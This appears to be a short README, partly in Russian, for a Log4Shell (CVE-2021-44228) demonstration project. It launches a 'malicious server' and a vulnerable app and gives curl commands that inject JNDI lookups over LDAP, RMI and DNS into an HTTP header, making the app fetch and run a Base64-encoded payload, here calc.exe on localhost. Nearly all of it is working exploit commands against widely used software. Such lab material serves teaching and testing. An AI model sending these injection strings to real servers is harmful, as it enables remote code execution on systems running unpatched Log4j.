
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...
Используйте уязвимую JDK, например JDK 1.8.0_181
Вредоносный сервер разворачивает следующие конечные точки:
./gradlew :malicious-server:bootRun
Уязвимое приложение разворачивает одну HTTP-конечную точку на 8082
./gradlew :vulnerable-app:bootRun
Выберите полезную нагрузку (payload), которая будет выполнена уязвимым приложением, и закодируйте её в Base64. Например, чтобы открыть калькулятор в Windows: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/